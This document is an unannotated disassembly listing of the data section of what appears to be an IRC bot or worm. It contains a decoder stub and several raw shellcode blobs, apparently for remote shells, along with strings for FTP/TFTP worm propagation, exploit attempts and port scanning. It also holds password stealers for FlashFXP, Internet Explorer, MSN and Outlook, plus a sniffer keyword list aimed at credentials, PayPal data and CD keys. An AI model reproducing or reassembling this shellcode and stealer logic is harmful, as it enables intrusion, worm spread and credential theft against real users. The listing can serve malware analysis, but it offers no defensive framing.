dword_41C6C8 dd 313333h ; DATA XREF: sub_411A09+F9�o
dword_41C6CC dd 52455355h, 0A0D3120h, 0 ; DATA XREF: sub_411A09:loc_411A8A�o
dword_41C6D8 dd 303232h ; DATA XREF: sub_411A09+63�o
unk_41C6DC db 2Dh ; - ; DATA XREF: sub_411BBC+115�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningFtpWorm db '- Running FTP wormride thread',0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_411BBC+6E�o
align 10h
aFtpWormrideThr db 'FTP wormride thread',0 ; DATA XREF: sub_411D68+36�o
dword_41C724 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_411DC5+5E2�o
unk_41C730 db 2Dh ; - ; DATA XREF: sub_411DC5+5BD�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TftpTransfer db '- %u. tftp transfer to %s complete.',0
align 10h
aWormride db 'wormride',0 ; DATA XREF: sub_411DC5+5B8�o
align 4
dword_41C76C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_411DC5+367�o
aOctet db 'octet',0 ; DATA XREF: sub_411DC5+333�o
; sub_411DC5+345�o
align 4
unk_41C788 db 2Dh ; - ; DATA XREF: sub_411DC5+144�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningTftpWor db '- Running TFTP wormride thread',0
aTftpWormrideTh db 'TFTP wormride thread',0 ; DATA XREF: sub_4123F6+2B�o
align 4
loc_41C7C8: ; DATA XREF: sub_4125DF+50�o
jmp short loc_41C7DF
; ---------------------------------------------------------------------------
loc_41C7CA: ; CODE XREF: .data:loc_41C7DF�p
mov ecx, 0
xor ecx, 0
pop esi
loc_41C7D6: ; CODE XREF: .data:0041C7DB�j
xor byte ptr [ecx+esi-1], 0
loop loc_41C7D6
jmp short near ptr dword_41C7E4
; ---------------------------------------------------------------------------
loc_41C7DF: ; CODE XREF: .data:loc_41C7C8�j
call loc_41C7CA
; ---------------------------------------------------------------------------
dword_41C7E4 dd 0 ; CODE XREF: .data:0041C7DD�j
dword_41C7E8 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+CB�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 6853h, 2680000h, 8B000000h, 6AD88BD4h, 0BA535210h, 5A603063h
dd 0B450D6FFh, 53555002h, 605800BAh, 0BFD6FFE2h, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C89C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+8C�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 2685353h, 8B000000h, 6AD88BD4h, 0BA535210h, 0C2A69000h
dd 5040D6FFh, 3B7ABA53h, 0D6FFA173h, 0BA535050h, 69D310h
dd 0D88BD6FFh, 0B450C033h, 53555002h, 605800BAh, 0BFD6FFE2h
dd 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C964 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+36�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 6AEC8B00h, 55544310h, 7232BA53h
dd 0D6FF1979h, 27D8166h, 0ED751111h, 22047D81h, 75222222h
dd 2B450E4h, 0BA535550h, 0E2605800h, 7D81D6FFh, 20EC8300h
dd 0BFEA758Bh, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41CA18 dd 8B20EC83h, 45D89ECh, 81007D89h, 200ECh, 14658900h, 8B64DB33h
; DATA XREF: sub_412720+71�o
dd 408B3043h, 1C708B0Ch, 8788BADh, 0E8087D89h, 45h, 5F8B5653h
dd 3B5C8B3Ch, 53DF0378h, 3205B8Bh, 0C38353DFh, 3338B04h
dd 0ACC933F7h, 0C1C1C832h, 75C08405h, 75CA2BF6h, 0D82B58E9h
dd 35EEBD1h, 0DF03245Eh, 8B0B8B66h, 0DF031C5Eh, 38B048Bh
dd 0FF5B5EC7h, 33685EE0h, 68000032h, 5F327377h, 6E92BA54h
dd 0D6FF8404h, 8B0C4589h, 46A53F8h, 475FF55h, 669000BAh
dd 83D6FFE0h, 850F04F8h, 0C5h, 0E8087D8Bh, 0Dh, 3 dup(0)
dd 18458F00h, 6A026A53h, 68535301h, 0C0000000h, 0BA1875FFh
dd 5C6BD33Dh, 4589D6FFh, 840F401Ch, 8Dh, 330C7D8Bh, 2B450C0h
dd 1475FF50h, 0BA0475FFh, 0E2605800h, 7D8BD6FFh, 74C08508h
dd 41C88B1Eh, 8D535774h, 5051104Dh, 0FF1475FFh, 0B9BA1C75h
dd 0FFCBF5BEh, 74C085D6h, 0FFC5EB40h, 5CBA1C75h, 0FF9DC593h
dd 58446AD6h, 0FC8BE02Bh, 33ABD78Bh, 59106AC0h, 8BFDE2ABh
dd 5252087Dh, 50505050h, 0FF505050h, 2CBA1875h, 0FF2694F1h
dd 0C7FE58D6h, 1BA5053h, 0FFDE34D6h, 1C75FFD6h, 0C5935CBAh
dd 0FFD6FF9Dh, 3DBA1875h, 0FF27CF53h, 0C7D8BD6h, 0BA0475FFh
dd 7315685h, 7D8BD6FFh, 46BABA08h, 0D6FFC10Ch
db 0
byte_41CB95 db 0E3h ; DATA XREF: sub_4125DF+CF�r
; sub_4125DF+E4�w
align 4
dword_41CB98 dd 4113E68Bh ; DATA XREF: sub_4125DF+60�r
; sub_4125DF+75�w
align 10h
off_41CBA0 dd offset loc_41CC28 ; DATA XREF: sub_4127D0+77�r
; ---------------------------------------------------------------------------
sbb al, 0CCh
inc ecx
add [esp+ecx*8], dl
inc ecx
add ah, bh
retf
; ---------------------------------------------------------------------------
inc ecx
add al, dh
retf
; ---------------------------------------------------------------------------
inc ecx
add [esp+ecx*8], dl
inc ecx
add ah, bl
retf
; ---------------------------------------------------------------------------
inc ecx
add al, dl
retf
; ---------------------------------------------------------------------------
dw 41h
dd offset dword_41CC14
align 10h
dd 0A3DCCCEEh, 0B7h, 0
dd 0FAC18FACh, 0C9F7BFE2h, 0A387EFFBh, 2 dup(0)
dd 0A1D7CCE7h, 2 dup(0)
aMpRRdJ db '¬ÁÜÆÁ×êIJà„׆Ï',0
align 10h
dd 0
dword_41CC14 dd 2 dup(0) ; DATA XREF: .data:0041CBC0�o
; .data:off_41DA48�o ...
dword_41CC1C dd 0A1D6CDEAh, 2 dup(0) ; DATA XREF: .data:off_41DA44�o
; ---------------------------------------------------------------------------
loc_41CC28: ; DATA XREF: .data:off_41CBA0�o
; .data:off_41DA40�o
lodsb
pop ecx
jmp edx
; ---------------------------------------------------------------------------
db 0E8h, 0FCh, 0C3h
dd 0B492F6B1h, 0E6AEF0E3h, 0B0h, 0
dword_41CC40 dd 72h ; DATA XREF: sub_412A3A:loc_412B93�o
dword_41CC44 dd 62h ; DATA XREF: sub_412BC9:loc_412D11�o
dword_41CC48 dd 63h ; DATA XREF: sub_412D56:loc_412DC8�o
dword_41CC4C dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_412E04+64�o
dd 6C6C6568h, 65646F63h, 72657320h, 20726576h, 70206E6Fh
dd 2074726Fh, 2343003h, 2037325h, 0
dword_41CC84 dd 6C656853h, 646F636Ch, 65732065h, 72657672h, 206E6F20h
; DATA XREF: sub_412F07+98�o
dd 74726F70h, 34300320h, 3752502h, 2
byte_41CCA8 db 0BBh ; DATA XREF: sub_41294E+3C�o
; sub_41294E+4C�o ...
db 9Fh, 80h, 0FCh
dd 0B1h, 2 dup(0)
dd 0EE000000h, 0DACFh, 3 dup(0)
db 2 dup(0)
dword_41CCCE dd 9BA648F6h ; DATA XREF: sub_41294E+2B�r
; sub_412FC6+31�r ...
dword_41CCD2 dd 0 ; DATA XREF: sub_412FC6+57�w
; sub_414052+B5�r ...
off_41CCD6 dd offset sub_410649 ; DATA XREF: sub_41294E+1C�r
; sub_412FC6+18�r ...
dw 3
dd 0
dd 99B10000h, 0F8E2E19Bh, 0FAh, 2 dup(0)
dd 0DAC8EB00h, 4 dup(0)
dd 77C2B3DDh, 0
dd offset sub_410B52
dd 3, 10h dup(0)
dword_41CD58 dd 6E695728h, 293233h ; DATA XREF: sub_41308F+217�o
dword_41CD60 dd 696E5528h, 2978h ; DATA XREF: sub_41308F+1F1�o
dword_41CD68 dd 63617041h, 252F6568h, 75h ; DATA XREF: sub_41308F+1DF�o
aApache db 'Apache',0 ; DATA XREF: sub_41308F+1B9�o
align 4
aMicrosoftIisU_ db 'Microsoft-IIS/%u.%u',0 ; DATA XREF: sub_41308F+130�o
aMicrosoftIis db 'Microsoft-IIS',0 ; DATA XREF: sub_41308F+FC�o
align 10h
aServer db 'Server:',0 ; DATA XREF: sub_41308F+7A�o
aOptionsHttp1_0 db 'OPTIONS / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41308F+B�o
db 0Dh,0Ah,0
align 10h
unk_41CDC0 db 53h ; S ; DATA XREF: sub_41349C+5E4�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 3
db 30h, 34h, 2
db 25h ; %
db 73h, 3, 2
db 3Ah ; :
db 25h, 73h, 20h
db 69h ; i
db 6Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 30h ; 0
db 2Eh, 32h, 66h
db 3
db 2, 73h, 65h
db 63h ; c
db 2Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aOpenIpSFound db 'open IP(s) found',0
align 4
dword_41CE04 dd 2343003h, 2037325h, 2073253Ah, 6F207369h, 6E6570h
; DATA XREF: sub_41349C+55E�o
dword_41CE18 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_41349C+343�o
dd 2343003h, 2037325h, 2073253Ah, 20726F66h, 2343003h
dd 2037525h, 63657320h, 28646E6Fh, 2973h
dword_41CE50 dd 6E616353h, 676E696Eh, 34300320h, 3732502h, 73253A02h
; DATA XREF: sub_41349C+305�o
dd 726F6620h, 34300320h, 3752502h, 65732002h, 646E6F63h
dd 297328h
unk_41CE7C db 53h ; S ; DATA XREF: sub_413AB0+1DC�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 69h, 6Eh, 67h
db 20h
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
db 3Ah, 25h, 73h
db 20h
db 66h, 6Fh, 72h
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aSecondSTUSU db ' second(s), t:%u s:%u',0
align 4
dword_41CEB4 dd 3430032Dh, 3752502h, 41202D02h, 6D657474h, 64657470h
; DATA XREF: sub_413CB3+30E�o
dd 34300320h, 3752502h, 78652002h, 696F6C70h, 69746174h
dd 73286E6Fh, 6E6F2029h, 34300320h, 3752502h, 50492002h
dd 2E297328h, 0
dword_41CEF8 dd 65747441h, 6974706Dh, 7420676Eh, 7865206Fh, 696F6C70h
; DATA XREF: sub_413CB3+2B0�o
dd 30032074h, 73250234h, 77200203h, 20687469h, 2343003h
dd 2037325h, 2E2E2Eh
unk_41CF28 db 2Dh ; - ; DATA XREF: sub_413CB3+31�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aAttemptingTo_0 db '- Attempting to exploit IP',27h,'s in list.',0
align 4
aAttemptingToEx db 'Attempting to exploit IP',27h,'s in list.',0 ; DATA XREF: sub_413FE7+52�o
dword_41CF7C dd 3003203Ah, 75250234h, 202E0203h, 0 ; DATA XREF: sub_414052+BB�o
aExploitStatist db 'Exploit statistics - ',0 ; DATA XREF: sub_414052+29�o
align 4
aListingExploit db 'Listing exploit statistics',0 ; DATA XREF: sub_41417D+2B�o
align 10h
dword_41CFC0 dd 62616E55h, 7420656Ch, 6F63206Fh, 63656E6Eh, 6F742074h
; DATA XREF: sub_4141C1+D8�o
dd 34300320h, 3732502h, 6F702002h, 3207472h, 25023430h
dd 2E020373h, 0
dword_41CFF0 dd 656D6954h, 2074756Fh, 7563636Fh, 20646572h, 6C696877h
; DATA XREF: sub_4141C1+B4�o
dd 6F632065h, 63656E6Eh, 676E6974h, 206F7420h, 2343003h
dd 2037325h, 3430033Ah, 3732502h, 202E02h
dword_41D028 dd 6E6E6F43h, 65746365h, 6F742064h, 34300320h, 3732502h
; DATA XREF: sub_4141C1+78�o
dd 30033A02h, 73250234h, 69200203h, 3003206Eh, 75250234h
dd 203736Dh, 2Eh
dword_41D058 dd 6E6E6F43h, 69746365h, 7420676Eh, 7325206Fh, 726F7020h
; DATA XREF: sub_4142BF+D8�o
dd 30032074h, 73250234h, 203h
unk_41D078 db 53h ; S ; DATA XREF: sub_4143B0+221�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 25h ; %
db 73h, 20h, 69h
db 6Eh ; n
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 30h
db 2Eh ; .
db 32h, 66h, 3
db 2
db 73h, 65h, 63h
db 2Eh ; .
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 6Fh
aPenPortSFound db 'pen port(s) found',0
align 4
dword_41D0B4 dd 33A7325h, 25023430h, 20020373h, 6F207369h, 6E6570h
; DATA XREF: sub_4143B0+1BA�o
dword_41D0C8 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_4143B0+81�o
dd 70207325h, 2074726Fh, 2343003h, 2037525h, 3430032Dh
dd 3752502h, 69772002h, 3206874h, 25023430h, 20020375h
dd 6B636F73h, 73287465h, 29h
dword_41D110 dd 6E616353h, 676E696Eh, 20732520h, 74726F70h, 34300320h
; DATA XREF: sub_414600+1BE�o
dd 3752502h, 30032D02h, 75250234h, 77200203h, 20687469h
dd 2343003h, 2037525h, 636F7320h, 2874656Bh, 2973h
aYa36za48dehfrv db 'yA36zA48dEhfrvghGRg57h5UlDv3',0 ; DATA XREF: sub_4147E5+6�o
; sub_4147E5+C6�o
align 4
aSflashfxpSites db '%sFlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+107�o
align 4
aFlashfxpSites_ db '\FlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+B6�o
aProgramfiles db 'ProgramFiles',0 ; DATA XREF: sub_4148CE+AB�o
align 4
aSites_dat db 'sites.dat',0 ; DATA XREF: sub_4148CE:loc_414945�o
align 4
aFlashfxp_exe1 db 'FlashFXP.exe %1',0 ; DATA XREF: sub_4148CE+57�o
aSoftwareClasse db 'SOFTWARE\Classes\Applications\FlashFXP.exe\shell\open\command',0
; DATA XREF: sub_4148CE+15�o
align 4
unk_41D204 db 2Dh ; - ; DATA XREF: sub_414A1E+464�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 2Fh, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aFlashfxpPass_0 db 'FlashFXP password(s).',0
align 10h
dword_41D240 dd 2343003h, 2037525h ; DATA XREF: sub_414A1E+3C4�o
a_FlashfxpFtpSS db '. FlashFXP - ftp://%s:%s@%s:%s - %s',0
aPass127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+352�o
db 'Pass=%127s',0Dh,0Ah,0
align 4
aUser127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+338�o
db 'User=%127s',0Dh,0Ah,0
align 4
aPort127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+31E�o
db 'Port=%127s',0Dh,0Ah,0
align 4
aIp127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+304�o
db 'IP=%127s',0Dh,0Ah,0
align 4
asc_41D2AC db '[%[^]]]',0Dh,0Ah,0 ; DATA XREF: sub_414A1E+2EA�o
align 4
aPass_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1F4�o
db 'Pass=',0
aUser_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1DC�o
db 'User=',0
aPort db 0Dh,0Ah ; DATA XREF: sub_414A1E+1C4�o
db 'Port=',0
aIp db 0Dh,0Ah ; DATA XREF: sub_414A1E+1AC�o
db 'IP=',0
align 4
asc_41D2D8 db 0Dh,0Ah ; DATA XREF: sub_414A1E:loc_414BA6�o
db 0Dh,0Ah
db '[',0
align 10h
unk_41D2E0 db 2Dh ; - ; DATA XREF: sub_414A1E+55�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingFlashfx db '- Listing FlashFXP passwords',0
align 4
aFlashfxpPasswo db 'FlashFXP password stealer',0 ; DATA XREF: sub_414EB0+2B�o
align 4
unk_41D324 db 2Dh ; - ; DATA XREF: sub_414EF4+B8A�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 69h
aNternetExplore db 'nternet explorer password(s).',0
align 10h
dword_41D360 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6D6F436Fh
; DATA XREF: sub_414EF4+AD8�o
dd 74656C70h, 61502065h, 6F777373h, 20736472h, 6953202Dh
dd 203A6574h, 2343003h, 2037325h, 614E202Eh, 203A656Dh
dd 2343003h, 2037325h, 6150202Eh, 6F777373h, 203A6472h
dd 2343003h, 2037325h, 2Eh
dword_41D3BC dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6F43206Fh
; DATA XREF: sub_414EF4+A2B�o
dd 656C706Dh, 66206574h, 646C6569h, 202D2073h, 6C656946h
dd 3203A64h, 25023430h, 2E020373h, 74614420h, 3203A61h
dd 25023430h, 2E020373h, 0
dword_41D404 dd 70747468h, 2F3A73h ; DATA XREF: sub_414EF4+9DD�o
dword_41D40C dd 70747468h, 2F3Ah ; DATA XREF: sub_414EF4+9C6�o
dword_41D414 dd 7274533Ah, 676E69h ; DATA XREF: sub_414EF4+983�o
; sub_414EF4+99A�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_414EF4+968�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_414EF4:loc_415842�o
align 4
dword_41D434 dd 2343003h, 2037525h, 534D202Eh, 7845204Eh, 726F6C70h
; DATA XREF: sub_414EF4+935�o
dd 2D207265h, 4E534D20h, 3A444920h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
dword_41D474 dd 2Ch ; DATA XREF: sub_414EF4+83B�o
; sub_414EF4+852�o ...
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_414EF4:loc_4155CE�o
align 4
dword_41D484 dd 2343003h, 2037525h, 4549202Eh, 7361503Ah, 726F7773h
; DATA XREF: sub_414EF4+6C6�o
dd 72502D64h, 6365746Fh, 20646574h, 6953202Dh, 203A6574h
dd 2343003h, 2037325h, 614E202Eh, 203A656Dh, 2343003h
dd 2037325h, 6150202Eh, 6F777373h, 203A6472h, 2343003h
dd 2037325h, 2Eh
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_414EF4:loc_41550C�o
align 4
dword_41D4E8 dd 2343003h, 2037525h, 754F202Eh, 6F6F6C74h, 7078456Bh
; DATA XREF: sub_414EF4+604�o
dd 73736572h, 4E202D20h, 3A656D61h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_414EF4+5C2�o
align 4
aWs db '%ws',0 ; DATA XREF: sub_414EF4+41C�o
asc_41D538 db '%x',0 ; DATA XREF: sub_414EF4+234�o
align 4
unk_41D53C db 2Dh ; - ; DATA XREF: sub_414EF4+1A9�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingInterne db '- Listing internet explorer passwords',0
align 10h
dword_41D570 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; DATA XREF: sub_414EF4+123�o
; sub_414EF4+2C7�o ...
aInternetExplor db 'Internet explorer password stealer',0 ; DATA XREF: sub_415AF0+36�o
align 4
dword_41D5A4 dd 65746E49h, 74736572h, 20676E69h, 636F7270h, 65737365h
; DATA XREF: sub_415B60+277�o
dd 202D2073h, 75736956h, 43206C61h, 36202B2Bh, 3003203Ah
dd 73250234h, 202E0203h, 65726E55h, 52496C61h, 203A4443h
dd 2343003h, 2037325h, 7453202Eh, 3A6D6165h, 34300320h
dd 3732502h, 57202E02h, 646C726Fh, 20664F20h, 63726157h
dd 74666172h, 3003203Ah, 73250234h, 202E0203h, 716E6F43h
dd 20726575h, 696C6E4Fh, 203A656Eh, 2343003h, 2037325h
dd 2Eh
aSoftwareValveS db 'Software\Valve\Steam',0 ; DATA XREF: sub_415B60+149�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++',0
; DATA XREF: sub_415B60+10A�o
align 4
aConquer db '[Conquer]',0 ; DATA XREF: sub_415B60:loc_415C2F�o
align 4
aWorldOfWarcraf db 'World Of Warcraft',0 ; DATA XREF: sub_415B60:loc_415C0E�o
align 4
aUnreal3 db 'Unreal3',0 ; DATA XREF: sub_415B60+8C�o
aListingInteres db 'Listing interesting processes',0 ; DATA XREF: sub_415DFD+2B�o
align 4
off_41D6D4 dd offset aUser_1 ; DATA XREF: sub_415EB7+32�o
; "user "
dd offset aUnknown_1 ; "unknown "
dd offset aPass_2 ; "pass "
dd offset aMailpass ; "MailPass "
dd offset aOper ; "oper "
dd 0
dd offset aIdentify ; "identify "
dd 0
dd offset aAuth_0 ; " :auth "
dd 0
dd offset aPasswd_0 ; "passwd="
dd 0
dd offset aUsername_0 ; "username="
dd 0
dd offset aPassword_0 ; "password="
dd 0
dd offset aLogin_1 ; "login="
dd 0
dd offset aPass_1 ; "pass="
dd 0
dd offset aPw ; "pw="
align 10h
off_41D730 dd offset aLogin_0 ; DATA XREF: sub_415EB7+54�o
; "login "
align 8
dd offset aSxt ; "sxt "
align 10h
dd offset aAuth ; "auth "
align 8
dd offset aPasswort ; "passwort "
align 10h
dd offset aCdkey ; "cdkey"
align 8
dd offset aCdKey_0 ; "cd-key"
dd 0
dd offset aCdKey ; "cd key"
align 8
dd offset aPassword ; "password"
align 10h
dd offset aPaypal_com ; "paypal.com"
align 8
dd offset aPaypal ; "paypal"
align 10h
dd offset aIrcOperator ; "irc operator"
align 8
dd offset aLP ; "l/p"
align 10h
dd offset aSsh1_5 ; "SSH-1.5"
dd 0
dd offset aSsh1_99 ; "SSH-1.99"
dd 2 dup(0)
off_41D7A4 dd offset aSetCookie ; DATA XREF: sub_415EB7+76�o
; "Set-Cookie:"
dd 0
dd offset aSyn ; "syn"
dd 0
dd offset aFlood ; "flood "
dd 0
dd offset aClone ; "clone "
dd 0
dd offset aServU_0 ; "serv-u"
dd 0
dd offset aServU ; "serv u"
dd 0
dd offset aServu ; "servu"
dd 0
dd offset aDdos ; "ddos"
dd 2 dup(0)
off_41D7E8 dd offset dword_41D844 ; DATA XREF: sub_415EB7+98�o
align 10h
dd offset dword_41D83C
align 8
dd offset dword_41D834
align 10h
dd offset dword_41D82C
align 8
dd offset dword_41D824
align 10h
dd offset dword_41D81C
dd 2 dup(0)
dword_41D81C dd 54495551h, 20h ; DATA XREF: .data:0041D810�o
dword_41D824 dd 54524150h, 20h ; DATA XREF: .data:0041D808�o
dword_41D82C dd 4E494F4Ah, 20h ; DATA XREF: .data:0041D800�o
dword_41D834 dd 49504F54h, 2043h ; DATA XREF: .data:0041D7F8�o
dword_41D83C dd 49544F4Eh, 204543h ; DATA XREF: .data:0041D7F0�o
dword_41D844 dd 56495250h, 2047534Dh, 0 ; DATA XREF: .data:off_41D7E8�o
aDdos db 'ddos',0 ; DATA XREF: .data:0041D7DC�o
align 4
aServu db 'servu',0 ; DATA XREF: .data:0041D7D4�o
align 10h
aServU db 'serv u',0 ; DATA XREF: .data:0041D7CC�o
align 4
aServU_0 db 'serv-u',0 ; DATA XREF: .data:0041D7C4�o
align 10h
aClone db 'clone ',0 ; DATA XREF: .data:0041D7BC�o
align 4
aFlood db 'flood ',0 ; DATA XREF: .data:0041D7B4�o
align 10h
aSyn db 'syn',0 ; DATA XREF: .data:0041D7AC�o
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: .data:off_41D7A4�o
aSsh1_99 db 'SSH-1.99',0 ; DATA XREF: .data:0041D798�o
align 4
aSsh1_5 db 'SSH-1.5',0 ; DATA XREF: .data:0041D790�o
aLP db 'l/p',0 ; DATA XREF: .data:0041D788�o
aIrcOperator db 'irc operator',0 ; DATA XREF: .data:0041D780�o
align 4
aPaypal db 'paypal',0 ; DATA XREF: .data:0041D778�o
align 10h
aPaypal_com db 'paypal.com',0 ; DATA XREF: .data:0041D770�o
align 4
aCdKey db 'cd key',0 ; DATA XREF: .data:0041D760�o
align 4
aCdKey_0 db 'cd-key',0 ; DATA XREF: .data:0041D758�o
align 4
aCdkey db 'cdkey',0 ; DATA XREF: .data:0041D750�o
align 4
aPasswort db 'passwort ',0 ; DATA XREF: .data:0041D748�o
align 10h
aAuth db 'auth ',0 ; DATA XREF: .data:0041D740�o
align 4
aSxt db 'sxt ',0 ; DATA XREF: .data:0041D738�o
align 10h
aLogin_0 db 'login ',0 ; DATA XREF: .data:off_41D730�o
align 4
aPw db 'pw=',0 ; DATA XREF: .data:0041D724�o
aPass_1 db 'pass=',0 ; DATA XREF: .data:0041D71C�o
align 4
aLogin_1 db 'login=',0 ; DATA XREF: .data:0041D714�o
align 4
aPassword_0 db 'password=',0 ; DATA XREF: .data:0041D70C�o
align 4
aUsername_0 db 'username=',0 ; DATA XREF: .data:0041D704�o
align 4
aPasswd_0 db 'passwd=',0 ; DATA XREF: .data:0041D6FC�o
aAuth_0 db ' :auth ',0 ; DATA XREF: .data:0041D6F4�o
aIdentify db 'identify ',0 ; DATA XREF: .data:0041D6EC�o
align 10h
aOper db 'oper ',0 ; DATA XREF: .data:0041D6E4�o
align 4
aMailpass db 'MailPass ',0 ; DATA XREF: .data:0041D6E0�o
align 4
aPass_2 db 'pass ',0 ; DATA XREF: .data:0041D6DC�o
align 4
aUnknown_1 db 'unknown ',0 ; DATA XREF: .data:0041D6D8�o
align 4
aUser_1 db 'user ',0 ; DATA XREF: .data:off_41D6D4�o
align 10h
dword_41D980 dd 70737553h, 6F696369h, 70207375h, 656B6361h, 72662074h
; DATA XREF: sub_415F69+5CE�o
dd 3206D6Fh, 25023430h, 3A020373h, 2343003h, 2037525h
dd 73253E2Dh, 2075253Ah, 0
unk_41D9B4 db 2Dh ; - ; DATA XREF: sub_415F69+1A6�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 65h ; e
db 76h, 65h, 6Ch
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aPacketSnifferR db ' packet sniffer running',0
align 4
dword_41D9E8 dd 6576654Ch, 3003206Ch, 75250234h, 70200203h, 656B6361h
; DATA XREF: sub_41665C+8E�o
dd 6E732074h, 65666669h, 72h, 41DA0Ch, 0FD8093AFh, 0D2E6E2ADh
dd 0A99AE3FBh, 2 dup(0)
dword_41DA20 dd 0E3F44AC0h ; DATA XREF: sub_40A9CF+843�r
; sub_4167F1+54�r ...
dword_41DA24 dd 94CFA2BAh ; DATA XREF: sub_4167F1+4C�r
dword_41DA28 dd 11B29A82h ; DATA XREF: sub_4167F1+41�r
dword_41DA2C dd 2B0ED8BCh ; DATA XREF: sub_4167F1+3B�r
dd 2 dup(0)
off_41DA38 dd offset dword_41DD10 ; DATA XREF: sub_40E618+1C3�r
; sub_40E618+1D5�r ...
align 10h
off_41DA40 dd offset loc_41CC28 ; DATA XREF: sub_40A9CF+7B3�r
; sub_40CF2F+82�r ...
off_41DA44 dd offset dword_41CC1C ; DATA XREF: sub_40CF2F+B8�r
off_41DA48 dd offset dword_41CC14 ; DATA XREF: sub_40CF2F+D0�r
; sub_40CF2F+DF�r
; ---------------------------------------------------------------------------
cld
retf
; ---------------------------------------------------------------------------
inc ecx
add al, dh
retf
; ---------------------------------------------------------------------------
inc ecx
add [esp+ecx*8], dl
inc ecx
